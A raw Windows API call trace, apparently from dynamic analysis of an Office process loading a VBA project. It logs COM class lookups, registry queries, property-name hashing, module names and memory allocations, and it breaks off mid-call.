MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3aab730, cbMultiByte=-1, lpWideCharStr=0x2e72d0, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0030.391] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x2e7358 | out: pclsid=0x2e7358*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0030.392] lstrcpynA (in: lpString1=0x2e7600, lpString2="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", iMaxLength=256 | out: lpString1="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}" [0030.392] lstrcpynA (in: lpString1=0x2e7500, lpString2="RDM", iMaxLength=256 | out: lpString1="RDM") returned="RDM" [0030.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7600, cbMultiByte=-1, lpWideCharStr=0x2e7300, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0030.392] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x2e7360 | out: pclsid=0x2e7360*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0030.392] SetCursor (hCursor=0x10007) returned 0x10007 [0030.392] CoCreateGuid (in: pguid=0x2e71a0 | out: pguid=0x2e71a0*(Data1=0xa5c278da, Data2=0xcf77, Data3=0x4fbd, Data4=([0]=0xbd, [1]=0x80, [2]=0x74, [3]=0x7c, [4]=0xce, [5]=0xa4, [6]=0xea, [7]=0x74))) returned 0x0 [0030.392] CoCreateGuid (in: pguid=0x2e7200 | out: pguid=0x2e7200*(Data1=0xb858e6ed, Data2=0x34bb, Data3=0x45f6, Data4=([0]=0x93, [1]=0xaf, [2]=0x69, [3]=0xd3, [4]=0xe9, [5]=0xf7, [6]=0x1c, [7]=0xcc))) returned 0x0 [0030.392] CoCreateGuid (in: pguid=0x2e71e0 | out: pguid=0x2e71e0*(Data1=0x5aff084d, Data2=0x9fe8, Data3=0x4542, Data4=([0]=0xb7, [1]=0x41, [2]=0x41, [3]=0x20, [4]=0xe0, [5]=0xc3, [6]=0x7b, [7]=0xb0))) returned 0x0 [0030.392] CoCreateGuid (in: pguid=0x2e71d0 | out: pguid=0x2e71d0*(Data1=0xc97eface, Data2=0x3e35, Data3=0x445f, Data4=([0]=0x98, [1]=0xe9, [2]=0xf1, [3]=0xd6, [4]=0x90, [5]=0xf6, [6]=0x77, [7]=0x62))) returned 0x0 [0030.392] CoCreateGuid (in: pguid=0x2e7210 | out: pguid=0x2e7210*(Data1=0x17082ab6, Data2=0x79de, Data3=0x4e3a, Data4=([0]=0xb6, [1]=0x60, [2]=0xf4, [3]=0xd3, [4]=0x3a, [5]=0x6d, [6]=0xfb, [7]=0x89))) returned 0x0 [0030.392] OleRegGetMiscStatus (in: clsid=0x2e7360*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f)), dwAspect=0x1, pdwStatus=0x2e6fa8 | out: pdwStatus=0x2e6fa8) returned 0x0 [0030.394] lstrcpyA (in: lpString1=0x2e6ed0, lpString2="CLSID\\" | out: lpString1="CLSID\\") returned="CLSID\\" [0030.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", cchWideChar=-1, lpMultiByteStr=0x2e6ed6, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpUsedDefaultChar=0x0) returned 0 [0030.394] lstrcatA (in: lpString1="CLSID\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpString2="\\DesignerFeatures" | out: lpString1="CLSID\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\DesignerFeatures") returned="CLSID\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\DesignerFeatures" [0030.394] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="CLSID\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\DesignerFeatures", phkResult=0x2e6ec0 | out: phkResult=0x2e6ec0*=0x0) returned 0x2 [0030.394] ProgIDFromCLSID (in: clsid=0x2e7360*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f)), lplpszProgID=0x2e6f90 | out: lplpszProgID=0x2e6f90*="Forms.Form.1") returned 0x0 [0030.397] IMalloc:Alloc (This=0x7fefe015380, cb=0x19) returned 0x7667d40 [0030.397] lstrlenA (lpString="Forms.Form.1") returned 12 [0030.397] IMalloc:Realloc (This=0x7fefe015380, pv=0x7667d40, cb=0xd) returned 0xb4909d0 [0030.397] IMalloc:Free (This=0x7fefe015380, pv=0x7667da0) [0030.397] lstrcpyA (in: lpString1=0x2e6fb0, lpString2="Form" | out: lpString1="Form") returned="Form" [0030.397] IMalloc:Free (This=0x7fefe015380, pv=0xb4909d0) [0030.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", cchWideChar=-1, lpMultiByteStr=0x2e6ff8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpUsedDefaultChar=0x0) returned 0 [0030.398] wsprintfA (in: param_1=0x2e6eb0, param_2="%s%s%s%s%s" | out: param_1="Clsid\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\InprocServer32") returned 59 [0030.398] RegOpenKeyExA (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\InprocServer32", ulOptions=0x0, samDesired=0x20019, phkResult=0x2e6e88 | out: phkResult=0x2e6e88*=0xa46) returned 0x0 [0030.398] RegQueryValueExA (in: hKey=0xa46, lpValueName="ThreadingModel", lpReserved=0x0, lpType=0x0, lpData=0x2e6e90, lpcbData=0x2e6e80*=0x14 | out: lpType=0x0, lpData=0x2e6e90*=0x41, lpcbData=0x2e6e80*=0xa) returned 0x0 [0030.399] lstrcmpiA (lpString1="Apartment", lpString2="Apartment") returned 0 [0030.399] lstrcmpiA (lpString1="Apartment", lpString2="Free") returned -1 [0030.399] lstrcmpiA (lpString1="Apartment", lpString2="Both") returned -1 [0030.399] RegCloseKey (hKey=0xa46) returned 0x0 [0030.399] CoCreateGuid (in: pguid=0x93bc9f4 | out: pguid=0x93bc9f4*(Data1=0x21a9254b, Data2=0x72b2, Data3=0x4058, Data4=([0]=0xb3, [1]=0x5b, [2]=0xa7, [3]=0x9f, [4]=0xe6, [5]=0xf8, [6]=0xb4, [7]=0xc4))) returned 0x0 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Name") returned 0x10f2f0 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Caption") returned 0x107810 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Left") returned 0x107be5 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Top") returned 0x10da35 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Width") returned 0x104e68 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Height") returned 0x108b7c [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Enabled") returned 0x10aadb [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.399] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="OleObjectBlob") returned 0x1098c2 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Visible") returned 0x10d3b6 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Tag") returned 0x10d826 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="HelpContextID") returned 0x102275 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientLeft") returned 0x104925 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientTop") returned 0x109869 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientWidth") returned 0x1028e4 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientHeight") returned 0x107da9 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="WhatsThisButton") returned 0x104418 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="WhatsThisHelp") returned 0x103fe5 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="RightToLeft") returned 0x10e0c6 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="StartUpPosition") returned 0x10fb67 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ShowModal") returned 0x109408 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="TypeInfoVer") returned 0x107334 [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Move") returned 0x10793e [0030.400] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.401] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_") returned 0x101076 [0030.401] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Show") returned 0x10f50f [0030.401] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Hide") returned 0x107a39 [0030.401] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="PrintForm") returned 0x101f14 [0030.401] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="WhatsThisMode") returned 0x105081 [0030.401] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Resize") returned 0x103440 [0030.401] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="QueryClose") returned 0x10f454 [0030.401] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Activate") returned 0x107c97 [0030.401] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Deactivate") returned 0x10ae6a [0030.401] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Initialize") returned 0x104ed3 [0030.401] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Terminate") returned 0x104c79 [0030.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", cchWideChar=-1, lpMultiByteStr=0x2e6ec0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpUsedDefaultChar=0x0) returned 0 [0030.401] lstrlenA (lpString="RDM") returned 3 [0030.401] lstrcmpiA (lpString1="Begin", lpString2="Caption") returned -1 [0030.401] lstrcmpiA (lpString1="End", lpString2="Caption") returned 1 [0030.401] lstrcpynA (in: lpString1=0x2e7700, lpString2="Caption", iMaxLength=256 | out: lpString1="Caption") returned="Caption" [0030.401] lstrcmpiA (lpString1="Begin", lpString2="ClientHeight") returned -1 [0030.401] lstrcmpiA (lpString1="End", lpString2="ClientHeight") returned 1 [0030.402] lstrcpynA (in: lpString1=0x2e7700, lpString2="ClientHeight", iMaxLength=256 | out: lpString1="ClientHeight") returned="ClientHeight" [0030.402] lstrcmpiA (lpString1="Begin", lpString2="ClientLeft") returned -1 [0030.402] lstrcmpiA (lpString1="End", lpString2="ClientLeft") returned 1 [0030.402] lstrcpynA (in: lpString1=0x2e7700, lpString2="ClientLeft", iMaxLength=256 | out: lpString1="ClientLeft") returned="ClientLeft" [0030.402] lstrcmpiA (lpString1="Begin", lpString2="ClientTop") returned -1 [0030.402] lstrcmpiA (lpString1="End", lpString2="ClientTop") returned 1 [0030.402] lstrcpynA (in: lpString1=0x2e7700, lpString2="ClientTop", iMaxLength=256 | out: lpString1="ClientTop") returned="ClientTop" [0030.402] lstrcmpiA (lpString1="Begin", lpString2="ClientWidth") returned -1 [0030.402] lstrcmpiA (lpString1="End", lpString2="ClientWidth") returned 1 [0030.402] lstrcpynA (in: lpString1=0x2e7700, lpString2="ClientWidth", iMaxLength=256 | out: lpString1="ClientWidth") returned="ClientWidth" [0030.402] lstrcmpiA (lpString1="Begin", lpString2="StartUpPosition") returned -1 [0030.402] lstrcmpiA (lpString1="End", lpString2="StartUpPosition") returned -1 [0030.402] lstrcpynA (in: lpString1=0x2e7700, lpString2="StartUpPosition", iMaxLength=256 | out: lpString1="StartUpPosition") returned="StartUpPosition" [0030.402] lstrcmpiA (lpString1="Begin", lpString2="TypeInfoVer") returned -1 [0030.402] lstrcmpiA (lpString1="End", lpString2="TypeInfoVer") returned -1 [0030.402] lstrcpynA (in: lpString1=0x2e7700, lpString2="TypeInfoVer", iMaxLength=256 | out: lpString1="TypeInfoVer") returned="TypeInfoVer" [0030.402] lstrcmpiA (lpString1="Begin", lpString2="End") returned -1 [0030.402] lstrcmpiA (lpString1="End", lpString2="End") returned 0 [0030.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7600, cbMultiByte=-1, lpWideCharStr=0x2e7330, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0030.402] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x2e7380 | out: pclsid=0x2e7380*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0030.402] lstrcmpiA (lpString1="End", lpString2="End") returned 0 [0030.402] CExposedDocFile::Release () returned 0x1 [0030.402] lstrcmpiA (lpString1="RDM", lpString2="RDM") returned 0 [0030.402] lstrlenA (lpString="RDM") returned 3 [0030.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x93b8969, cbMultiByte=-1, lpWideCharStr=0x2e7910, cchWideChar=4 | out: lpWideCharStr="RDM") returned 4 [0030.402] lstrcpyA (in: lpString1=0x91ddfb0, lpString2="" | out: lpString1="") returned="" [0030.402] lstrcmpiA (lpString1="Rape", lpString2="Rape") returned 0 [0030.402] lstrlenA (lpString="Rape") returned 4 [0030.404] lstrcpyA (in: lpString1=0x93b8bc0, lpString2="" | out: lpString1="") returned="" [0030.404] lstrcmpiA (lpString1="Class1", lpString2="Class1") returned 0 [0030.404] lstrlenA (lpString="Class1") returned 6 [0030.404] lstrcpyA (in: lpString1=0x93b8c20, lpString2="" | out: lpString1="") returned="" [0030.404] lstrcmpiA (lpString1="OXIPL", lpString2="OXIPL") returned 0 [0030.404] lstrlenA (lpString="OXIPL") returned 5 [0030.404] lstrcpyA (in: lpString1=0x93b8c40, lpString2="" | out: lpString1="") returned="" [0030.404] lstrcmpiA (lpString1="Module1", lpString2="Module1") returned 0 [0030.404] lstrlenA (lpString="Module1") returned 7 [0030.404] lstrcpyA (in: lpString1=0x93b8c60, lpString2="" | out: lpString1="") returned="" [0030.404] lstrcmpiA (lpString1="Module2", lpString2="Module2") returned 0 [0030.404] lstrlenA (lpString="Module2") returned 7 [0030.404] atoi (_Str="393222000") returned 393222000 [0030.404] lstrcpynA (in: lpString1=0x91dcb0c, lpString2="{5DB0DAE4-D70A-42B4-A937-4C16D7C3463F}", iMaxLength=39 | out: lpString1="{5DB0DAE4-D70A-42B4-A937-4C16D7C3463F}") returned="{5DB0DAE4-D70A-42B4-A937-4C16D7C3463F}" [0030.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{00000000-0000-0000-0000-000000000000}", cchWideChar=-1, lpMultiByteStr=0x2e7930, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{00000000-0000-0000-0000-000000000000}", lpUsedDefaultChar=0x0) returned 0 [0030.404] lstrcmpA (lpString1="{00000000-0000-0000-0000-000000000000}", lpString2="{5DB0DAE4-D70A-42B4-A937-4C16D7C3463F}") returned -1 [0030.404] lstrlenA (lpString="{5DB0DAE4-D70A-42B4-A937-4C16D7C3463F}") returned 38 [0030.404] lstrlenA (lpString="{5DB0DAE4-D70A-42B4-A937-4C16D7C3463F}") returned 38 [0030.405] lstrlenA (lpString="{5DB0DAE4-D70A-42B4-A937-4C16D7C3463F}") returned 38 [0030.405] CExposedStream::Commit () returned 0x0 [0030.405] CExposedStream::Release () returned 0x0 [0030.405] CExposedDocFile::OpenStream () returned 0x80030002 [0030.405] lstrlenA (lpString="&H00000001") returned 10 [0030.405] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0030.405] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0030.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x93ba420, cbMultiByte=-1, lpWideCharStr=0x2e7970, cchWideChar=39 | out: lpWideCharStr="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 39 [0030.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x93ba447, cbMultiByte=-1, lpWideCharStr=0x2e7960, cchWideChar=4 | out: lpWideCharStr="VBE") returned 4 [0030.406] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0030.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667f28, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0030.406] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0030.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667f28, cbMultiByte=8, lpWideCharStr=0x7667e38, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0030.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x2e7870, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0030.406] lstrlenA (lpString="Project") returned 7 [0030.406] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7667da0 [0030.406] GetCursorPos (in: lpPoint=0x2e7b20 | out: lpPoint=0x2e7b20*(x=270, y=190)) returned 1 [0030.406] GetCapture () returned 0x0 [0030.406] WindowFromPoint (Point=0xbe0000010e) returned 0x201b0 [0030.406] GetWindowThreadProcessId (in: hWnd=0x201b0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9dc [0030.406] SendMessageA (hWnd=0x201b0, Msg=0x84, wParam=0x0, lParam=0xbe010e) returned 0x1 [0030.406] SendMessageA (hWnd=0x201b0, Msg=0x20, wParam=0x201b0, lParam=0x2000001) returned 0x1 [0030.423] SetCursor (hCursor=0x10007) returned 0x10007 [0030.423] GetCurrentThreadId () returned 0x9dc [0030.423] GetCurrentThreadId () returned 0x9dc [0030.423] CExposedDocFile::CreateStorage () returned 0x0 [0030.423] IMalloc:Alloc (This=0x7fefe015380, cb=0x280) returned 0x7844770 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x1738) returned 0xb500f80 [0030.424] GetLocalTime (in: lpSystemTime=0x2e7338 | out: lpSystemTime=0x2e7338*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x13d)) [0030.424] _ultow_s (in: _Value=0x5b6852dd, _Buffer=0x784479a, _BufferCount=0x103, _Radix=16 | out: _Buffer="5b6852dd") returned 0x0 [0030.424] wcsncpy_s (in: _Destination=0x2e7000, _SizeInWords=0x108, _Source="*\\Z085b6852dd", _MaxCount=0x106 | out: _Destination="*\\Z085b6852dd") returned 0x0 [0030.424] CharLowerBuffW (in: lpsz="*\\Z085b6852dd", cchLength=0xd | out: lpsz="*\\z085b6852dd") returned 0xd [0030.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z085b6852dd", cchWideChar=14, lpMultiByteStr=0x2e6f30, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z085b6852dd", lpUsedDefaultChar=0x0) returned 14 [0030.424] wcscpy_s (in: _Destination=0x54f1c68, _SizeInWords=0xe, _Source="*\\Z085b6852dd" | out: _Destination="*\\Z085b6852dd") returned 0x0 [0030.424] wcsncpy_s (in: _Destination=0x2e7040, _SizeInWords=0x108, _Source="*\\Z085b6852dd", _MaxCount=0x106 | out: _Destination="*\\Z085b6852dd") returned 0x0 [0030.424] CharLowerBuffW (in: lpsz="*\\Z085b6852dd", cchLength=0xd | out: lpsz="*\\z085b6852dd") returned 0xd [0030.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z085b6852dd", cchWideChar=14, lpMultiByteStr=0x2e6f70, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z085b6852dd", lpUsedDefaultChar=0x0) returned 14 [0030.424] CExposedDocFile::AddRef () returned 0x2 [0030.424] CExposedDocFile::AddRef () returned 0x2 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x84) returned 0x78382c0 [0030.424] wcscpy_s (in: _Destination=0x7838330, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51dc40 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51dd00 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0x78030b0 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0x7803300 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0x7803550 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7667bc0 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0x7742da0 [0030.424] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x2e6cac, cchData=6 | out: lpLCData="1252") returned 5 [0030.424] atoi (_Str="1252") returned 1252 [0030.424] GetLocalTime (in: lpSystemTime=0x2e6ca0 | out: lpSystemTime=0x2e6ca0*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x13d)) [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838470 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6210 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838500 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667b90 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838590 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6220 [0030.424] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6230 [0030.424] VirtualAlloc (lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x6a70000 [0030.425] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x9cb0000 [0030.426] CExposedDocFile::CreateStream () returned 0x0 [0030.426] IMalloc:Alloc (This=0x7fefe015380, cb=0x420) returned 0xb4db430 [0030.426] CExposedStream::AddRef 